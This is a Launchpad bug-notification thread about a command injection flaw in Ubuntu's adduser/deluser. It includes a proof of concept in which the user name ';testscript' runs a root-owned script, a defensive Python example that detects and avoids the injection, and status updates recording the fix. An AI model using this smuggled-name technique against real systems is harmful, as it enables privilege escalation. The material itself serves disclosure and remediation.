[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
It's fixed in Debian by version 3.121 and therefore fixed in adduser
3.121ubuntu1 in Ubuntu 22.10 (kinetic).

** Changed in: adduser (Ubuntu)
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/1838489

Title:
  adduser & deluser shell command injection

Status in adduser package in Ubuntu:
  Fix Released
Status in adduser package in Debian:
  Fix Released

Bug description:
  deluser program is vulnerable to a command injection vulnerability
  when a user is added via adduser with special characters (such as
  ';'). It is only possible when the user exists on the system (adduser
  does not prevent usernames with ';' from being added.)

  This can be a security risk when user accounts on the system can be
  created from arbitrary input, and there are exploitable programs in
  PATH to make privilege escalation possible.

  -- Proof of concept

  # ll /test-file
  ls: cannot access '/test-file': No such file or directory

  # cat /usr/bin/testscript
  #!/bin/bash
  touch /test-file

  # deluser
  Enter a user name to remove: ;testscript
  no crontab for root
  crontab: usage error: no arguments permitted after this option
  usage:  crontab [-u user] file
          crontab [ -u user ] [ -i ] { -e | -l | -r }
                  (default operation is replace, per 1003.2)
          -e      (edit user's crontab)
          -l      (list user's crontab)
          -r      (delete user's crontab)
          -i      (prompt before deleting user's crontab)
  /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.

  (failed reverse-i-search)`': deluser^C
  # ll /test-file
  -rw--- 1 root root 0 Jul 31 10:25 /test-file

  system description

  Description:    Ubuntu 18.04.2 LTS
  Release:        18.04

  # apt-cache policy adduser
  adduser:
    Installed: 3.116ubuntu1
    Candidate: 3.116ubuntu1
    Version table:
   *** 3.116ubuntu1 500
          500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
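The root cause in the proof of concept above is a user name interpolated into a command string that a shell then parses, so the ';' in the name ends the crontab command and starts a second one. The following is an added example, not code from the bug report or from the adduser package: it tokenizes the command string the way a POSIX shell would to show the extra command, builds the argv form that leaves the shell out entirely, and audits a constructed /etc/passwd for names that should never have been accepted. The NAME_REGEX used here is an assumption that approximates adduser's default; the real value lives in /etc/adduser.conf.

```python
import re
import shlex
from typing import List

# Assumption: approximation of adduser's default NAME_REGEX. Read the actual
# value from /etc/adduser.conf on the system being audited.
DEFAULT_NAME_REGEX = re.compile(r"^[a-z][-a-z0-9_]*$")


def is_safe_username(name: str, pattern: re.Pattern = DEFAULT_NAME_REGEX) -> bool:
    """True when the name is one the regex accepts (no shell metacharacters)."""
    return bool(pattern.match(name))


def build_unsafe_command(username: str) -> str:
    """Mirror the shape of the command shown in the report: a string that a
    shell will parse, with the user name pasted in unquoted."""
    return f"/usr/bin/crontab -r {username}"


def shell_words(command: str) -> List[str]:
    """Tokenize a command string the way a POSIX shell would, with ';' as an
    operator token rather than part of a word."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lex)


def simple_commands_in(command: str) -> int:
    """Count the simple commands a shell would run: one, plus one per ';'."""
    return 1 + sum(1 for word in shell_words(command) if word == ";")


def build_safe_argv(username: str) -> List[str]:
    """argv form of the same operation: passed to subprocess.run() without
    shell=True, the name is exactly one argument whatever it contains. The
    name is still validated first so a bad account can never reach crontab.
    Uses the '-u user' form from crontab's own usage text."""
    if not is_safe_username(username):
        raise ValueError(f"username fails NAME_REGEX: {username!r}")
    return ["/usr/bin/crontab", "-r", "-u", username]


def find_suspicious_accounts(passwd_text: str) -> List[str]:
    """Defender check: list account names in passwd-format text that fail
    the regex, i.e. names adduser should have refused."""
    flagged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name = line.split(":", 1)[0]
        if not is_safe_username(name):
            flagged.append(name)
    return flagged


# Constructed sample, not taken from any real system.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
;testscript:x:1001:1001::/home/testscript:/bin/sh
"""

if __name__ == "__main__":
    for name in ("alice", ";testscript"):
        cmd = build_unsafe_command(name)
        print(f"{cmd!r} -> {simple_commands_in(cmd)} command(s): {shell_words(cmd)}")
    print("safe argv:", build_safe_argv("alice"))
    print("accounts failing NAME_REGEX:", find_suspicious_accounts(SAMPLE_PASSWD))
```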
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian)
       Status: Fix Committed => Fix Released

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  Fix Released
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian)
       Status: Confirmed => Fix Committed

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  Fix Committed
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian)
       Status: New => Confirmed

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  Confirmed
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian)
       Status: Unknown => New

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  New
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Thanks!

** Also affects: adduser (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577
   Importance: Unknown
       Status: Unknown

** Changed in: adduser (Ubuntu)
       Status: Incomplete => Confirmed

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  Unknown
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi,

I have reported this bug to Debian:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Warm regards,
Haoxi

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <
marc.deslauri...@canonical.com> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
>        Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security

** Bug watch added: Debian Bug tracker #940577
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Status in adduser package in Ubuntu:
  Incomplete
Re: [Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi Marc,

I will do it tonight. Will tell you once it's done :)

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <
marc.deslauri...@canonical.com> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
>        Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security

Status in adduser package in Ubuntu:
  Incomplete
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi! Have you had a chance to report this issue to Debian?

** Changed in: adduser (Ubuntu)
       Status: New => Incomplete

** Information type changed from Private Security to Public Security

Status in adduser package in Ubuntu:
  Incomplete